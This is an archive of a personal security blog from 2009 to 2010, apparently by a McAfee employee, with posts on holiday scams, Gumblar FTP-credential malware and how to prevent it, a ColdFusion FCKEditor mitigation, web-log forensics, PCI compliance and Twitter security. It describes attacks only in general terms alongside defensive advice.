{Se[C}ure], By James A. Lester

Windows XP desktop screen is a Napa, CA image

2010-01-25T11:30:00.000-08:00

Just a quick update with a cool little article on how the Original Windows XP desktop background image originated in Napa, CA (Where I currently Live).

I have been a little busy with not being busy at work trying to get some of my own projects and issues taken care of. The hardest thing about this blog for me is that it is hard to talk about work, when you can not talk about work. What I mean by that, is that I cannot write about anything that discloses sensitive information about a customer or something that McAfee does not approve. That is why anything that I have ever posted here, does not go into tremendous detail. I just like to keep up on writing and I actually enjoy it.

I think I am going to utilize this time to work on the root of the domain. I wanted to provide some details for the general public on where to find "useful" information if you have been victim of a compromise or hacked. I thought it would be a nice project and that is the overall reason why I even have this domain in the first place. We will see if I ever go through with it though.

Anyway, check out this article in the local newspaper that shows the origin of the Windows XP default background image. I swear I can almost determine where this picture was taken based on his description, but the fact that it is all vineyard now makes it difficult.

Anyway, see for yourself. (LINK)

Image provided by www.napavalleyregister.com

A Hackers Holiday

2009-12-23T07:59:00.000-08:00

I have been away from the office for a bit due to a cold that wont go away. Check out this youtube video put on by McAfee. Received this in an email this week.

McAfee's "Twelve Scams Of Christmas"

2009-11-19T10:00:00.000-08:00

McAfee has released their own version of the popular Christmas saying in "The Twelve Scams Of Christmas", revealing the 12 most dangerous scams users should be aware of during this Christmas season.

Scam I: Charity Phishing Scams – Be Careful Who You Give To
During the holiday season, hackers take advantage of citizens’ generosity by sending e-mails that appear to be from legitimate charitable organizations. In reality, they are fake Web sites designed to steal donations, credit card information and the identities of donors.

Scam II: Fake Invoices from Delivery Services to Steal Your Money
During the holidays, cybercriminals often send fake invoices and delivery notifications appearing to be from Federal Express, UPS or the U.S. Customs Service. They e-mail consumers asking for credit card details to credit back the account, or require users to open an online invoice or customs form to receive the package. Once completed, the person’s information is stolen or malware is automatically installed on their computer.

Scam III: Social Networking – A Cybercriminal “Wants to be Your Friend”
Cybercriminals take advantage of this social time of the year by sending authentic-looking “New Friend Request” e-mails from social networking sites. Internet users should beware that clicking on links in these e-mails can automatically install malware on computers and steal personal information.

Scam IV: The Dangers of Holiday E-Cards
Cyber thieves cash in on consumers who send holiday e-cards in an effort to be environmentally conscious. Last holiday season, McAfee Labs discovered a worm masked as Hallmark e-cards and McDonald’s and Coca-Cola holiday promotions. Holiday-themed PowerPoint e-mail attachments are also popular among cybercriminals. Be careful what you click on.

Scam V: “Luxury” Holiday Jewelry Comes at a High Price
McAfee Labs recently uncovered a new holiday campaign that leads shoppers to malware-ridden sites offering “discounted” luxury gifts from Cartier, Gucci, and Tag Heuer. Cybercriminals even use fraudulent logos of the Better Business Bureau to trick shoppers into buying products they never receive.

Scam VI: Practice Safe Holiday Shopping – Online Identity Theft on the Rise
Forrester Research Inc. predicts online holiday sales will increase this year, as more bargain hunters turn to the Web for deals. While users shop and surf on open hotspots, hackers can spy on their activity in an attempt to steal their personal information. McAfee tells users never to shop online from a public computer or on an open Wi-Fi network.

Scam VII: Christmas Carol Lyrics Can Be Dangerous – Risky Holiday Searches
During the holidays, hackers create fraudulent holiday-related Web sites for people searching for a holiday ringtone or wallpaper, Christmas carol lyrics or a festive screensaver. Downloading holiday-themed files may infect one’s computer with spyware, adware or other malware. McAfee found one Christmas carol download site that led searchers to adware, spyware and other potentially unwanted programs.

Scam VIII: Out of Work – Job-Related E-mail Scams
The U.S. unemployment rate recently spiked to 10.2 per cent, the highest level since 1983. Scammers are preying on desperate job-seekers in the poor economy, with the promise of high-paying jobs and work-from-home moneymaking opportunities. Once interested persons submit their information and pay their “set-up” fee, hackers steal their money instead of following through on the promised employment opportunity.

Scam IX: Outbidding for Crime – Auction Site Fraud
Scammers often lurk on auction sites during the holiday season. Buyers should beware of auction deals that appear too good to be true, because often times these purchases never reach their new owner.

Scam X: Password Stealing Scams
Password theft is rampant during the holidays, as thieves use low-cost tools to uncover a person’s password and send out malware to record keystrokes, called keylogging. Once criminals have access to one or more passwords, they gain vast access to consumers’ bank and credit card details and clean out accounts within minutes. They also commonly send out spam from a user’s account to their contacts.

Scam XI: E-Mail Banking Scams
Cybercriminals trick consumers into divulging their bank details by sending official-looking e-mails from financial institutions. They ask users to confirm their account information, including a user name and password, with a warning that their account will become invalid if they do not comply. Then they often sell this information through an underground online black market.

McAfee Labs believes cybercriminals are more actively scamming consumers with this tactic during the holidays since people are monitoring their purchases closely.

Scam XII: Your Files for Ransom – Ransomware Scams
Hackers gain control of people’s computers through several of these holiday scams. They then act as virtual kidnappers to hijack computer files and encrypt them, making them unreadable and inaccessible. The scammer holds the user’s files ransom by demanding payment in exchange for getting them back.

McAfee also advises Internet users to follow these five tips to protect their computers and personal information:

1. Never Click on Links in E-Mails: Go directly to a company or charity’s Web site by typing in the address or using a search engine. Never click on a link in an e-mail.

2. Use Updated Security Software: Protect your computer from malware, spyware, viruses and other threats with updated security suites. McAfee® Total Protection software provides fully-featured protection from current and emerging threats. It also comes built in with McAfee SiteAdvisor® technology, a safe search toolbar to warn consumers of a Web site’s safety rating as well as phishing protection. It uses intuitive red, yellow and green checkmarks to rate potentially dangerous Web sites when searched on Google, Yahoo! or Bing.

3. Shop and Bank on Secure Networks: Only check bank accounts or shop online on secure networks at home or work, wired or wireless. Wi-Fi networks should always be password-protected so hackers cannot gain access to them and spy on online activity.

Also, remember to only shop on Web sites that begin with https://, instead of http://, and seek out Web sites with security trustmarks, like McAfee SECURE™.

4. Use Different Passwords: Never use the same passwords for several online accounts. Diversify passwords and use a complex combination of letters, numbers and symbols.

5. Use Common Sense: If you are ever in doubt that an offer or product is not legitimate, do not click on it. Cybercriminals are behind many of the seemingly “good” deals on the Web, so exercise caution when searching and buying.

Link: Microsoft Security Intelligence Report v7 (Jan-Jul 09)

2009-11-02T10:35:00.000-08:00

Microsoft has recently updated their Security Intelligence Report that tries to identify the latest and greatest of malicious trends.
A quote from their malware blog.
"In this edition we provide an in-depth review of malicious and potentially unwanted software, software exploits, security breaches, software vulnerabilities (both Microsoft and third party) around the world as well as providing detailed views of a number of countries. We review malware distribution sites by country, discuss phishing and spam trends and geographic distribution, details on vulnerability disclosure practices, differences in threat distribution between consumers and enterprise and we also provide guidance for IT professionals and business decision makers based on this information."
Check the report out here (LINK).

Link: How to avoid Malware on Facebook and Twitter.

2009-11-02T10:27:00.000-08:00

You can always count on the fact that with the increased popularity that Facebook and Twitter are receiving, malware on these sites will soon follow and grow.
Read Write Web has posted an article of how to prevent or avoid popular malware tactics.
Check it out here (LINK)

File Hippo: Update Checker - The answer to keeping your workstation up to date.

2009-10-28T15:16:00.001-07:00

File Hippo which serves pretty much every piece of software that you could ever possibly want, came out with their own update checker. This very small app looks to see what software you have installed, and determines if there is an update available and prompts you. It does this without taking control of your computer and will not install any update without your permission.
This looks to be an awesome update utility that is perfect for the newest computer user all the way to the very experienced.
The application is very small and you can install it without having it automatically start when your computer starts.
Keeping your software up to date would be my biggest tip I can ever offer someone who wants to keep their computer virus/malware free.
I highly recommend this app to anyone who does not already have a decent strategy for maintaining updates for their software.
Check it out here (LINK)

APWG: What to do if your website has been hacked by phishers.

2009-10-26T11:00:00.000-07:00

The anti-phishing working group released a paper back in February that goes over what steps you should take if you or your website has been victim of a phishing compromise.
Check it out here.

McAfee Stop H* Commerce NBC airings.

2009-10-23T14:31:00.000-07:00

This is the broadcasting schedule for McAfee's Stop H*commerce mini movie.
Check it out (LINK)

Google: Best practices for cleaning up a compromised site.

2009-10-23T09:42:00.000-07:00

Yesterday, google's online security blog posted a nice informative article on what steps you should take to prevent and clean up a compromised website.
Check it out here (LINK).

The Return and Evolution of Gumblar

2009-10-23T08:33:00.000-07:00

So the new wave of Gumblar attacks are starting to come in at an alarming rate. From where I sit, it is just as effective as any previous wave as far as the amount of new compromises I have seen due to the highly successful trend. Gumblar, using current exploitable vulnerabilities in Adobe products has made an impressive comeback from being quiet for a few weeks. Attacking web developers and site managers local workstations, the malicious software installs a credential sniffing application looking for FTP login information and forwarding this vital data to a destination of the hackers preference.
The new wave has evolved, placing the malicious java script locally on the webserver making it more illusive and difficult to detect from the conventional user. It also looks like the evolution is continuing with pointing all malicious links to legitimate websites who were infected with the malicious payload to assist with fooling the user and detection from services such as google safe browsing. This to me is a huge step in the evolution of this malicious trend. With the success of these attacks, you start to realize that this particular trend of attack is not going to disappear any time soon, Especially with new browser protection features being implemented such as the Content Security Policy.

I was going to provide a list of all recent domains that the attackers are using, however they are legitimate sites and unless i point to the actual malicious script, it would be useless.

In a quick closing, my steps to help prevent this particular type of attack still stand (LINK).

H* Commerce: October 18th on NBC right after NFL Sports Sunday

2009-10-16T07:47:00.000-07:00

McAfee's multi part mini movie on the Business of Hacking You, is going to be shown on NBC on Sunday October 18th. This is actually a really good mini movie if you have not already seen it. I wouldn't say that it would be super informative to security professionals, but it is put together really well and worth the watch. Check it out.

McAfee Stop H* Commerce

The Software Piracy and Malware link

2009-10-15T09:46:00.000-07:00

The latest post from Ryan Naraine and Dancho Danchev's blog Zero day on Software Piracy leading to higher malware infection rates has sparked a small thread in my thought process. For all that have ever downloaded pirated software (never myself, and never when I was in college), you can clearly understand the statistical information that is being described in the report.
The reason for taking interest in this topic was the thought of how many different avenues a victim is prone to in installing malware via downloading pirated software. As an example, I wanted to draft out a possible situation and all of the possibilities that can arise out of the situation for the possible infection of malware.

User Bob decides to download a pirated copy of Microsoft Windows. Bob knows what pirated software is, and is halfway familiar with the usual sharing tools such as torrents, limewire, irc, usenet, ect ect. Bob decides to search in google for something like "windows XP black" (a popular pirated version of windows XP). Right off the bat, within the first 3 pages of googles results are a dozen or so malicious sites that have been flagged for malicious use. Lets say bob steers clear of the malicious sites and finds himself on a popular torrent site downloading an active torrent for the software.
A couple hours later, and bob has himself a .iso that he can burn to his favorite media and start the install process. The unfortunate thing about this torrent, is that a serial was not provided. Bob steps over to his favorite keygen/serial site via his arsenal of pirated links or google, and winds up with the possibility of being compromised with malware either via the site the serial/keygen is hosted on or via the serial/keygen file itself. Lets say for shits and giggles that bob manages to steer clear of being infected with malware because, well if he is doing a new install as apposed to an upgrade, what good is malware if it is only installed for an hour or so.

As we continue, Bob is now installing his fresh new copy of Windows on to his local desktop or laptop. Another potential for malware exists with the presence of the malware in the pirated software itself, but lets say for sake of blogging that this is not the case. Now one other issue for the potential existence or installation of malware is the fact that most pirated copies of windows have Microsoft update turned off by default and will never be updated with the latest security related patches. This issue might not exist right off the bat because the installed copy could be up to date on the date of the install, but all future security related issues will pose a problem for the software installed.
Now on to my favorite, the installation of an antivirus. Antivirus are one of the most popular pirated software's out there and also one of the most prone to containing malicious software if downloaded illegally. The reason being, is that if you are downloading an anti-virus, then chances are, you do not have one installed. This is the perfect opportunity (and possibly the last opportunity) for malware to sneak in under the radar without being detected.

However way you look at it (or are infected by), downloading pirated software poses a great risk to the installation of malicious software. Any avenue that takes you into an attackers controlled domain, is setting up the potential risk of being infected. Would I advise you to not download and install pirated software, that is not my problem. However, I will always advise that if you would like to remain malware free, make sure that all of your software is legitimate and updated, and stay off of the 3rd world of the internet (Both of these are broken by downloading pirated software.) You are already at a high of enough risk from being infected from legitimate sites that have been infected.

The Big Picture (At least my Opinion of it)

2009-09-02T08:31:00.000-07:00

Its been a little hectic lately around the work place and I have been temporally diverted from my daily tasks to help out on a few new issues. This has caused me to be somewhat pulled away from the Security Front lines. Because of this, I wanted to create a post a little more opinionated and take a look at the big picture instead of focusing on recent trends or new discoveries.

The inspiration for writing this post is coming from a not so sober night in Vegas for defcon a couple weeks ago. While I was there I was able to meet up with a fellow peer and create a sloppy unsober discussion on security. I couldn't really tell you what we were discussing but one part that stuck out in my mind was when I was called up do defend the product I work for (again). I am not saying that I fully agree with the development of my product because I am on the security side of things and will always take a security standpoint on the product discussion and its issues. Working here and having discussions with our product manager and understanding the role of business has definitely led me to have a better understanding of what is best for the product, might not be best for business and vice versa. I know that is a vague statement, but I will leave it at that (and that is another discussion in itself).
Now back to our intoxicating night in Vegas, the statement that has stuck with me was when I was explaining the McAfee Secure product and how I truly believe that we are doing a large part in increasing the security of e commerce websites on the internet. I honestly felt that I believed that the McAfee Secure product does make a difference in the overall big picture of security and I brought up the example of SQL injection. I did not disclose numbers (frankly because it would be hard to calculate) but I expressed that I believe that the McAfee Secure product has disclosed thousands and thousands of exploitable SQL injection vectors and that an incredibly large majority of those have been re mediated (at least 99%). I feel that since the creation of McAfee Secure (originally ScanAlert) in 2001, the product itself has made as much as an impact as any other security scanning solution out there. I have never gone out and researched this, but I do not really feel that it is necessary, because it is purely my opinion.
The part that really made this discussion stick in my mind is the response, "I have a lot of trouble believing that". There is nothing wrong with this response and honestly it is coming from a peer that I respect (and I am sure he will most likely read this post). What got me, was that I do feel that there is a huge misunderstanding and the belief that a product such as McAfee Secure is a worthless security product or does not provide an effective security solution.

I am not going to touch on why I do not agree with this opinion or why I believe that this opinion has formed (because I like to keep my posts neutral). What I do wish to say, is that it seems to be a common thing out there in the world of security. It seems that size, success, standards, understanding, goal, marketing, etc etc all have a place in determining if a product is successful as a security solution or not.

Now the BIG PICTURE. Where does this all come in. Well for me, it all fits together in the overall understanding of The PCI security Council and their feat ahead of them. Or the major financial institutions or major e commerce websites who are attempting to attack security on a daily basis. How it might be difficult to build and maintain a security solution based on the fact that there are now security issues that might not have been an issue when the company/product was first created. I will leave all of these issues and solutions to your own opinion. We all face challenges in security and making the internet a safer place. We all have difficulty in understanding other businesses practices and their methods of achieving success in security. We have all heard the issue of how do you make a network (or internet) that was never designed to handle security controls, a more secure environment.

In closing, I have over the last few months of complaining about PCI and their method of delivering an effective security solution to e commerce, come to settle down and give them a little credit for trying to accomplish such a difficult task without having a large impact on the functionality of e commerce itself. I do believe that their product is making an impact and although it is not the method that I would run with, it is becoming more and more effective and gaining ground an inch at a time.

That is just my opinion and ill let your own opinions run with this.

An Update

2009-08-27T10:24:00.000-07:00

I just wanted to give a quick post. I have a couple personal things on my plate that is stealing focus from being able to Post here.
Hopefully next week, I will be able to take some time to do some write ups that I have been hovering over lately.

While im at it.
Check out www.securitytube.net Cool site and great tutorials.

Stop H* Commerce series is finally complete.

2009-08-05T10:25:00.000-07:00

McAfee has released all of the episodes of the Stop H* Commerce series. This is truly a great mini-flick to watch. I highly recommend it to anyone in the industry. It is not that it contains highly technical material, it is just a good story and is put together really well.
"Great for the wife and kids"

Link

Awesome Opportunity for an Up and Coming Security Analyst (Securosis Internship)

2009-08-04T10:34:00.000-07:00

There have been a lot of these quick blogs lately, but I feel that they are right down my alley so the beatings will continue.
Securosis posted over on their highly read, followed, and respected blog that they will be accepting intern opportunities to join their team of professionals in continuing research on security related topics.
This is a great opportunity for individuals such as myself who are tying to find their way in this industry.

It could be you!

Just read about it here. - LINK

Destination Vegas!! Yee

2009-07-30T12:31:00.000-07:00

Getting ready to take off for Las Vegas to catch the end of the conventions. I was not able to get the time to attend Black Hat but on short notice, I am going out for the defcon meetup.

It will be nice to meet some professionals in the industry, and maybe the opportunity to display my special set of skills used in the art of seeking new employment, whatever that means.

Top 10 Botnets

2009-07-23T09:39:00.001-07:00

A quick Post.
Network world has released a nice article ranking the top 10 botnets in activity.
Ranked by size and strength.
Check it (Link)

Another critical issue with Adobe Products.

2009-07-23T08:46:00.000-07:00

Yesterday the 21st Adobe posted on their blog that they are aware of a serious issue and will release more details. Walking into the office this morning, they have already provided more details.

"A critical vulnerability exists in the current versions of Flash Player (v9.0.159.0 and v10.0.22.87) for Windows, Macintosh and Linux operating systems, and the authplay.dll component that ships with Adobe Reader and Acrobat v9.x for Windows, Macintosh and UNIX operating systems. This vulnerability (CVE-2009-1862) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild via limited, targeted attacks against Adobe Reader v9 on Windows."

The Current Fix

"Deleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat v9.x mitigates the threat for those products, but users will experience a non-exploitable crash or error message when opening a PDF that contains SWF content."

Stay up to date on this issue via their security bulletin. (Link)
Also a good write-up by Avert Labs (Link)

Social Engineering: Check!

2009-07-22T10:04:00.000-07:00

With everything that you hear about in the news lately regarding social engineering attacks (twitter), it makes you wonder how vulnerable you are to this particular type of attack. Now I have always had some common sense with creating passwords and security questions, but I have not always been that concerned with security and bottom line, IM LAZY.

These days there are multiple levels of authentication that are necessary in order to retrieve a password and although it makes it a little more difficult, if it is successful, it usually results in multiple accounts being compromised (myspace --> email --> other email). I have always tried to create unique difficult security questions for each service or application but this can really become a mess. It seems as though the only current solution to this type of mess is something like OpenId or a password manager, which has security issues and theories on its own, so I will not get into them. So for the most part, you are stuck with multiple sites, with multiple passwords, with multiple security questions, that might be dependent on another service or application for fulfill your password request whether it be authentication or reset.

While pondering all of these security issues with passwords and social engineering, the first thing that I went out and did, was try and reset my password on multiple services and applications to verify that I do not have a week security question or password. This was somewhat of a difficult task, because how would you define which services are in danger of being used for social engineering. I possible cannot figure out every single service that I have signed up with and setup my password and secret question for. What I have to do is analyze which services would ultimately lead to the compromise of high priority or sensitive services, whether it be its own, or another service.
I have included in this list.
Email accounts
Social Networking Sites
Financial institutions
Educational Institution
Work Related Sites.

All other sites I would use generic unique throw away passwords, and If I happen to forget, I would just have it reset to to my email address. I am not sure if this would be classified as a security technique, but more likely classified in the laziness category.

The next thing that I did, was visit any social networking sites that I belong to, to make sure I am not just giving away sensitive information that would assist in social engineering. I searched these sites for things like making sure my background is not my favorite color (although I would never try to use that type of question as my security question.). I feel that social engineering sites have the potential of giving away more security questions, than doing a deep dive search into someones background. This leads me to the third step that I checked out which is doing a basic search on sites like google for more information on myself. I was amazed that the majority of information leakage came from the registration of this domain (thanks whoever, to bad it is not very accurate). I thought when I purchased this domain, I payed for suppression of my information but I guess I need to revisit that.

It is not very easy to assess the difficulty of being victim to Social Engineering attacks. I think in all reality, the only way to really know, is by waiting. I guess it would be a good idea to ask a really good friend who knows you really well to try to get into some of your services even using his above average knowledge of your life. For me, if some type of compromise would ever occur, it would be more embarrassing than damaging and either way, I would love to prevent it from ever occurring.

Until then, thank you to google and yahoo for going back and reminding me to change my security questions and provide a secondary email address. That was very thoughtful.

YourMom may cause a breach of browser security.

2009-07-20T15:04:00.000-07:00

Ha, Found this on Site Advisor (Link)

Even Better.....JamesLester may cause a breach in your browser security.
Link

Fun with Logs: Chasin Doods Down

2009-07-14T15:30:00.001-07:00

Came in this morning just waiting for something to pop up to get my mind off this little heat wave.
First thing this morning I received another compromise and had an opportunity to do a little investigating.

The customer came to me stating after an email that alerted him to his website being compromised, he was able to identify a malicious file on his webserver and removed the file. The next day, the customer noticed that the file reappeared so he decided to query our service. After conducting an interview with the customer, I was able to request his RAW log files for parsing. This is where the fun begins.

After doing a quick parse of the log files searching for signatures related to recent trends, requests that contain sql injection, or any type of malicious activity, I was able to find a call to a malicious .php file. I documented the ip address, timestamp and name of the .php file and modified my parsing signatures to further break down this attack. After parsing out the .php file I was able to see in the log files the duration where the customer removed the .php file and where the attacker was able to re apply the file. I was able to use this information to further parse the log files and identify the IP address that initially setup the call to install the malicious .php file for the initial instance and the second installation. With this information I was able to go back and further modify my parsing to include all requests made by this malicious IP address. Right before a call to the malicious .php file I was able to document the request that the attacker made to use a page within the customers admin section to upload a .php file which contains the code to install all malicious .php files.
Forwarding all findings to the customer, he is now able to get in touch with his hosting company to secure his insecure section of his website.

There is really nothing out 0f the ordinary here, but it has been a while since ive had to do any investigating other than looking at FTP logs and identifying the issue as being Gumblar. It is nice to get back to using skills to chase down legitimate webserver attacks. It has slowly been picking back up and I hope that these types of opportunities come in at a steady rate. The more of these, the faster the day seems to go by.
And on that note, time to go home.

0day in Cold Fusion.......Bring Them On!

2009-07-06T15:50:00.000-07:00

Adobe has Blogged about a severe issue contained in the FCKEditor that is enabled by default in some versions of Coldfusion 8. I have finally met up with this particular attack and am actually excited to receive it. It has been a while since I have worked with customers on a compromise that actually occurred due to the insecurity of their webserver (Im talking about you Gumblar).
There has not been a patch released yet, but I am sure that there is one to come.

In the mean time, I have some logs to review and websites to manually test( Actual Kinda Police Work Again).

If you are running ColdFusion 8, Here is a Temporary fix to mitigate the issue. Ill put it up nice and PINK Too!

1. Disable connectors by setting config.Enabled to false in the editor/filemanager/connectors/cfm/config.cfm file.
2. Remove unused cfm files under editor/filemanager/connectors/cfm directory of the FCKeditor.
3. Inspect FCKeditor directories for content that has already been uploaded. The uploaded files go under the directory specified in the config.UserFilesPath set in config.cfm.

Steps To Prevent Gumblar / Martuz / Nine-Ball

2009-06-29T13:38:00.000-07:00

Now that people are starting to finally notice the huge success of the recent trends of malware that attempt to obtain your FTP credentials, I thought I would try to compile together steps to prevent this type of attack. Now there has always been the battle of security and convenience and I truly believe that until this trend dies down, it is crucial for all companies to lean a little more towards the security side of things and to just deal with the lack of convenience.
No one is safe from this type of attack, including Bank of America, Cisco, Amazon, and even my own company McAfee (see link) . The security of your webserver is now also dependent on the security of your employees workstation or laptop.

So what can be done to prevent this type of attack? It will really be dependent on your server configuration, but there are always steps that can be taken.

CLIENT SIDE: Lets start by looking at steps that your employees can take in order to help prevent their workstation from being compromised with the root of the cause, MALWARE. These are not in any real order of convenience or impact of security.

1. Make sure that your anti virus is up to date: Even though there is a very low detection rate on these exploits, it is always recommended to have an Antivirus installed and make sure that it is updated regularly.
2. Make sure that you are running Windows Update: The more patched your system is, the less exploits you are giving an attacker to try to compromise your workstation with.
3. Make sure you get over to Adobe.com and update both Flash and Acrobat : These for the most part, are the exploits that attackers are attempting to compromise your workstation with. They are using exploits that have been identified in flash and acrobat months ago and have already been secured by adobe.
4. Disable Javascript access to Adobe Reader: Very useful and for the most part, you wont notice it disabled.

Click on "Edit" from the file menu bar, then "Preferences."
From the open dialog box, select the "JavaScript" item.
Uncheck "Enable Acrobat JavaScript".
Click "OK" .

5. Use a Secure FTP client if available: One of the methods that attackers are attempting to retrieve your FTP credentials, is to sniff out your plain text passwords when you connect out to your FTP server. If you use a secure FTP client, your passwords will not be sent in plain text or unencrypted. You will want to make sure that your FTP server accepts Secure FTP authentication.
6. Run an anti malware program like Malwarebytes: This is an awesome application that will attempt to discover if malware such as gumblar is infecting your workstation.
7. Change your passwords more frequently: Change your passwords often. This includes your workstation , FTP, cPanel or Bind, ect ect. There are even settings that will automatically change your FTP credentials Daily. You might want to utilize this feature until this trend calms down (or forever).
8. Install a client side firewall that checks for open inbound and outbound connections and alerts you of any changes: An example would be Zone alarm: These are extremely annoying but will be beneficial in the long run.

Server Side: Now lets look at server side modifications that will assist in the prevention of Gumblar based attacks. Once again, in no order.
Do you think that your website is a current victim of Gumblar? Step on over to www.unmaskparasites.com and find out.

1. Install an FTP server that allows Secure connections: There are so many FTP applications out there that allow the client to connect using a secure connection. For all you know, the FTP server you are using now might have this feature. Check it out.
2. Individualize FTP user credentials: Go back and reassess who has credentials. Do they actually need them? If they do, individualize the user name. This will assist in determining where the insecurity is coming from. You will be able to identify what user is compromised and is leaking their credentials.
3. IP restrict your FTP server: Create a whitelist of all IP addresses or ranges that are currently accessing your FTP server. Blacklist everything else.
4. Setup some type of application or routine that checks new or modified files on the server for unauthorized modification: Catch them in the act and prevent them from being able to modify files. List your file system by last modified and verify that the modification is authorized.
5. Routinely check your FTP log files for unauthorized activity: Grab your FTP log files on a daily or weekly basis and review all inbound connections. Check the IP address that established a connection and verify that it is authorized.
6. Make sure that you are running some type of Root Kit detection application on a regular basis: Added Protection, nuff said.
7. Step on over to a site like Unmaskparasites.com and check your site for current presence of malware. Wepawet is also another service that is used for analyzing malware sites. (quickly identifying malware on your website is something that I would consider damage prevention)

I think I have touched on most of the current methods of prevention. All of these are not necessary but will all help in prevention. If you are on a shared server, contact your hosting company and ask what they can do you to help prevent this issue.
Last but not least, if you have any other methods for prevention, let me know.

First attendance to an OWASP chapter meeting.

2009-06-23T11:07:00.000-07:00

Yesterday June the 22nd I was able to attend my first ever OWASP SF chapter meeting at the SF Federal Reserve. Overall, it was a pretty cool meet up. I really enjoyed that the meeting was at the federal reserve building because on entry and exit to the meeting you really got to see the reserves security practices in real time. When we arrived we had to wait for a large enough group to be checked in and escorted to the conference room. They did not take security lightly and even stopped us all and required that we all wear our badges above the waist and visible. Once we were in the conference room, there was the usual IT diet (Pizza and Soda) and it was somewhat social which is always cool for networking.
There were two talks presented during the meeting. The first talk was presented by Jeremy Brotherton on "Analyzing Web Malware" which I found quite interesting because he went into depth on the exploitation of the recent Trend Gumblar which I have previously posted on(here and here). The talk focused on decompiling the Flash file that was used as the method of exploitation for gumblar which was very interesting for me being that I have never really dove into the actual cause of exploitation.
The second talk was by Dave Maynor on "Threats on the Go-Go, Web Threats to Mobile Devices". This was an eye opening discussion on Mobile Devices and the false assumption that all mobile devices are secure. The discussion was very interesting and will definitely motivate me to keep an eye out on Mobile Devices and their current state of security.

I think it would be beneficial during these meetings to go back elementary school style and have some time to randomly sit with peers and be able to introduce yourself and talk about current topics. I think that one of the greatest aspects of these meetings is to network and meet other professionals in your field of study. Living in Napa, it is quite difficult to meet other security professionals and to sit down and throw ideas back and forth.

Until the next meeting.

Hackersafe and Scanless PCI trustmark on same Website.

2009-06-22T08:57:00.000-07:00

Got a cool email this weekend from "The Institute for Application Security Specialists" giving notification for the grand opening of their new store loaded with awesome ASS merchandise. Now you can let everyone know that you are an ASS, by proudly displaying the ASS logo wherever you go.
One thing that caught my eye on their store is the display of both the Mcafee Secure logo and the Scanless PCI logo.

I love it, even though the McAfee Secure badge is coming from the certification of cafepress, It is still an awesome sight and quite odd.

OnSite Audits, a Go for Level 2 Merchants.

2009-06-18T09:56:00.001-07:00

In my Opinion, a positive step in the direction of PCI compliance has occurred that now requires all level 2 Merchants to have an annual OnSite Audit Conducted in order to obtain their compliance. This to me is a huge step over the security/convenience battle that I believe is having a large impact on PCI being an actual legit security solution. Now MasterCard is the only company who has made this positive change, but it will still need to be enforced, and I am hoping that all will follow suite.

Check the nfo...Link

Dear Webhost, Please enable Logging. Thank You.

2009-06-17T08:33:00.000-07:00

Working with compromised accounts that have fell victim to the recent trend of Gumblar and Nine-Ball, I am noticing that there a lot of Web Hosting Companies that do not have logging enabled. They will either have RAW web access logs enabled for one day worth of retention (absolutely useless) , or none at all. So with that being said.

Webhosts, Please enable logging.
Please allow logging retention of at least 1 year.
Please enable FTP logging.

PCI DSS Requirement 10.7 asks that you retain audit trail history for at least one year, with a minimum of three months immediately available for analysis. The entire portion of Section 10 in the requirements are devoted to audit trail and storage of log files. This is a very crucial entity to analysis of the webserver. If you are not retaining log files, then you are not running a PCI complaint hosting environment, Bottom Line.

How many Security Professionals does it Take to tell Google that it could be more secure?

2009-06-16T09:29:00.000-07:00

And the answer is......37. You can put 37 different security gurus into one room and I can almost guarantee that if you bring up any current security topic, you will always hear pros and cons to each side of the story and its actual impact from a security standpoint. Give these professionals the topic of Making services within google such as gmail default to using high levels of encryption via SSL, and you have an unanimous agreement(its a no brainer). That is was occured in sending a letter over to google, in which google responded the very same day on their blog. To me, that is making an impact, and you are making google consider decisions that will affect a lot of users and a large impact to the overall security of the internet. I can properly justify that statement being that anything Google is doing, could some way impact the entire status of the internet.

Pretty Cool Stuff.

A look back on Twitter

2009-06-15T14:39:00.001-07:00

For the Record, I think that an application like Twitter is one that will be mimicked often from here on out. Being a fan of Blogging, I have no problem with the idea of a "Micro Blog" and believe that the concept will be seen for years to come. I also believe that an application like Twitter will be used widely by security professionals as not only a way to tweet or communicate, but a way to share resources quickly maybe changing the game from zerosec to zerotweet. I can already mentally see how superior the crew in the movie Hackers would have been, with the ability to tweet at each other to pool resources and communicate. There would simply have been no need for a movie they would have been so leet. It would have at least spared all of us from a sequel.

With all of the articles that are being posted on Twitter it is no secret that they have been plagued with one security issue after another. I myself was even able to jump on Twitter about three weeks ago, and within a couple of minutes find some severe security related issues that will need attention by the busy Twitter staff. Aviv Raff posted today that he is going to blog on "July: Month of Twitter Bugs" in which I will try to follow closely because I not only want to see what he digs up, but I am also confident that it will spark up a lot more issues from other security professionals regarding twitter and their lack of security.

With my post today, I wanted to bring a little bit of historical data to the story of Twitter and there is just some things that do not make a lot of sense to me when I go back and look at the details. One of the common tools that I use often when assessing the overall security of a website is www.archive.org . Going back and reviewing archived pages of a website can be useful in so many different ways, but to me twitter has a lot more to reveal.
Besides the observation that Twitter.com has most likely been plagued with security issues since day one, the first thing that I noticed was "Wow, Twitter has sure been around a long time, why has it seen an enormous amount of growth only recently. Stats on Complete.com show that Twitter is really a product of 2009 (can be argued, but the stats do show convincing evidence), and to be sitting there basically idle for so many years is just crazy to me. It really makes you feel that twitter was not ready for the super boom and it just came somewhat out of the blue. Now I know that there are a lot of factors that play into Twitters recent popularity including the recent boom in Web enabled Mobile Phones , but I would most likely attribute that the major cause for the spike in popularity of twitter is due to its marketing and public craze having the feeling that if you are not on twitter, then you are not up on the newest social playground. I see this type of marketing as being the future trend in social networking sites jumping from one popular service to another leaving the previous site dried up like a ghost town.

The question that has been mind bottling to me is, when does a company like twitter , take a step back and identify that security needs to be a very large aspect to their product? You would assume that increasing in popularity by some million fold percentage would do it or their increase in budget ( I am only assuming they have a larger budget now these days, if they dont, there is a larger issue than security going on). Is it possibly going to take the Month of July and all of its bug releases and Blogging to have them go into overdrive with security?

One of the largest realizations that I made when I first came into Web Application Security, was that large or small, every company or website can be plagued with issues and to not trust a large website just because it is large and everyone else is using it. Twitter can really reinforce this observation and hopefully will bring some light into peoples eyes. But then again, does it stop the public from tweeting.

I can honestly say, that by following other professionals or groups, Twitter has had a positive influence on myself in the world of security. Maybe their developers should add a few more Twits to follow like the entire group SecurityTwits.

A must (IMO) for PCI to be successful.

2009-06-08T10:21:00.000-07:00

This post might be a duplicate post for me, but every day that I work with the PCI standard, I am more convinced that something needs to change, so I want to touch back up on it.
